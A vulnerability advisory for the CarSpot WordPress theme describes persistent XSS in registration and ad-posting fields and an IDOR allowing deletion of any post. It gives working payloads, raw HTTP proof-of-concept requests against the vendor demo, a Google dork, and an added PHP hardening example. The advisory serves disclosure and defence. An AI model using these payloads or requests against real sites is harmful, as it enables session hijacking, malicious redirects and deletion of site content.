CarSpot < 2.2.1 - Multiple Vulnerabilities



Description
Multiple vulnerabilities were discovered in the «CarSpot – Dealership WordPress Classified Theme»; tested version: v2.2.0.

- Authenticated Persistent XSS -> Registration Form/User Profile
- Authenticated Persistent XSS -> Ad Post
- IDOR leading to arbitrary deletion of ads

Edit (WPScanTeam):
January 17th, 2020 - Report Received & Envato Contacted
January 17th, 2020 - Envato Investigating
January 23rd, 2020 - v2.2.1 released, but issues still present in the demo.
January 24th, 2020 - Envato Contacted again.
January 27th, 2020 - Demo updated to 2.2.1, fixing the issue for new posts/ads, but data from previous ones is still not encoded/escaped when output.

Proof of Concept
----[]- Info: -[]----
Demo website: https://carspot.scriptsbundle.com/
Demo Profile #0: https://carspot.scriptsbundle.com/dealer/m0ze-1054757240/
Demo Profile #1: https://carspot.scriptsbundle.com/dealer/greetzfromm0ze/
Demo Profile #2: https://carspot.scriptsbundle.com/dealer/jibom21023/
Demo Ad (greetzfromm0ze/asdasd): https://carspot.scriptsbundle.com/?post_type=ad_post&p=3886
Google Dork: /wp-content/themes/carspot/


----[]- Persistent XSS -> Registration Form/User Profile: -[]----
A cookie-stealing payload can be used to hijack a user or administrator session, or to force a redirect to a malicious website. Vulnerable input field: «Mobile Number».

Payload Sample: "><!--<img src="--><img src=x onerror=(alert)(`m0ze`);window.location=`https://m0ze.ru`;//">

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: carspot.scriptsbundle.com
User-Agent: Mozilla/5.0
...
Referer: https://carspot.scriptsbundle.com/register/
Cookie: _your_cookies_here_

action=sb_register_user&sb_data=sb_reg_name%3Dm0ze%253C!--%253Cimg%2Bsrc%253D%2522--%253E%253Cimg%2Bsrc%253Dx%2Bonerror%253D(alert)(%2560m0ze%2560)%252F%252F%2522%253E%26sb_reg_contact%3D%2522%253E%253C!--%253Cimg%2Bsrc%253D%2522--%253E%253Cimg%2Bsrc%253Dx%2Bonerror%253D(alert)(%2560m0ze%2560)%253Bwindow.location%253D%2560https%253A%252F%252Fm0ze.ru%2560%253B%252F%252F%2522%253E%26sb_reg_email%3Dm0ze%2540was.here%26sb_reg_password%3Dasdasd%26sb_user_type%3Ddealer%26minimal-checkbox-1%3Don%26is_captcha%3Dno


----[]- Persistent XSS -> Ad Post: -[]----
A cookie-stealing payload can be used to hijack a user or administrator session, or to force a redirect to a malicious website. Vulnerable input fields: «Mobile Number», «Address», «Latitude» and «Longitude».

Payload Sample #0: "><!--<img src="--><img src=x onerror=(alert)(`m0ze`);window.location=`https://m0ze.ru`;//">
Payload Sample #1: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: carspot.scriptsbundle.com
User-Agent: Mozilla/5.0
...
Referer: https://carspot.scriptsbundle.com/sell-your-car/
Cookie: _your_cookies_here_

action=sb_ad_posting&sb_data=ad_title=PoC&is_update=&is_level=&country_level=&ad_cat=62&ad_cat_id=227&ad_cat_sub=227&ad_cat_sub_sub=228&ad_price=1337&ad_price_type=Fixed&ad_avg_hwy=1337&ad_avg_city=1337&ad_mileage=1337&_carspot_ad_condition=166%7CNew&_carspot_ad_type=76%7CBuy&_carspot_ad_warranty=248%7CYes&_carspot_ad_years=36%7C2013&_carspot_ad_body_types=118%7CHatchback&_carspot_ad_transmissions=67%7CAutomatic&_carspot_ad_engine_capacities=44%7C3500&_carspot_ad_engine_types=126%7CHybrid&_carspot_ad_assembles=131%7CImported&_carspot_ad_colors=69%7CBlack&_carspot_ad_insurance=247%7CYes&ad_features%5B%5D=Cool+Box&ad_yvideo=&tags=&ad_description=PoC&sb_total_extra=0&ad_country=230&ad_country_id=293&ad_country_states=293&sb_user_name=m0ze&sb_contact_number=%22%3E%3C!--%3Cimg%20src%3D%22--%3E%3Cimg%20src%3Dx%20onerror%3D(alert)(%60m0ze%60)%3Bwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%2F%2F%22%3E&sb_user_address=%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D(alert)(%60Address%60)%2F%2F%22%3E&ad_map_lat=%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D(alert)(%60Latitude%60)%2F%2F%22%3E&ad_map_long=%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D(alert)(%60Longitude%60)%2F%2F%22%3E&sb_make_it_feature=on&is_update=


----[]- IDOR: -[]----
Delete any post/page/ad:

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: carspot.scriptsbundle.com
User-Agent: Mozilla/5.0
...
Referer: https://carspot.scriptsbundle.com/search-cars/?carspot_layout_type=4
Cookie: _your_cookies_here_

action=sb_remove_ad&ad_id=XXXX

Where:
ad_id=XXXX - the unique WordPress ID of the page/post/ad; it is exposed as a class on the page's <body> tag.


Response:

HTTP/1.1 200 OK
...

1|Ad removed successfully.
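As an added example that is not the theme's code, the following shows how the deletion endpoint and the «Mobile Number» field from the sections above could be hardened in a WordPress theme: an ownership/capability check on sb_remove_ad, and strict input validation plus attribute-context escaping on output (the function names, nonce name and user meta key are hypothetical; the action name, post type ad_post, field name sb_contact_number and the "1|..." reply format are taken from the PoC).

```php
<?php
// Added example, not CarSpot's code. Function names, the nonce name and
// the user meta key are hypothetical; action name, post type and field
// name are the ones seen in the advisory's PoC requests.
add_action( 'wp_ajax_sb_remove_ad', 'hardened_sb_remove_ad' );

function hardened_sb_remove_ad() {
	// Reject requests that do not carry a nonce issued for this action (CSRF).
	check_ajax_referer( 'carspot_remove_ad', 'nonce' );
	$ad_id = isset( $_POST['ad_id'] ) ? absint( $_POST['ad_id'] ) : 0;
	$ad    = $ad_id ? get_post( $ad_id ) : null;

	// Only objects of the expected post type may be removed through this
	// endpoint; the PoC shows that any post or page ID was accepted.
	if ( ! $ad || 'ad_post' !== $ad->post_type ) {
		wp_send_json_error( 'Invalid ad.', 400 );
	}

	// The authorisation check that was missing: the caller must own the ad
	// or hold the delete_post capability for it (editors/administrators).
	$is_owner = (int) $ad->post_author === get_current_user_id();
	if ( ! $is_owner && ! current_user_can( 'delete_post', $ad_id ) ) {
		wp_send_json_error( 'Not allowed.', 403 );
	}

	wp_trash_post( $ad_id );
	echo '1|Ad removed successfully.';
	wp_die();
}

// Input side: a phone number never needs quotes or angle brackets, so
// reject anything outside a strict character set instead of storing it.
function hardened_save_contact_number( $user_id, $raw ) {
	$clean = sanitize_text_field( wp_unslash( $raw ) );
	if ( ! preg_match( '/^\+?[0-9][0-9 ().-]{2,31}$/', $clean ) ) {
		return false;
	}
	update_user_meta( $user_id, 'sb_contact_number', $clean );
	return true;
}

// Output side: escape for the attribute context every time the value is
// rendered, which also covers values stored before the fix (the gap noted
// in the WPScanTeam timeline for 2.2.1).
function hardened_contact_number_field( $user_id ) {
	$stored = get_user_meta( $user_id, 'sb_contact_number', true );
	return '<input type="text" name="sb_contact_number" value="' . esc_attr( $stored ) . '">';
}
```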

Affects Theme

Fixed in version 2.2.1

References

URL https://themeforest.net/item/carspot-automotive-car-dealer-wordpress-classified-theme/20195539

Classification

Type MULTI

Miscellaneous

Original Researcher m0ze
Submitter m0ze
Submitter Twitter m0ze_ru
Views 3704
Verified No
WPVDB ID 10047

Timeline

Publicly Published 2020-01-27
Added 2020-01-27
Last Updated 2020-02-10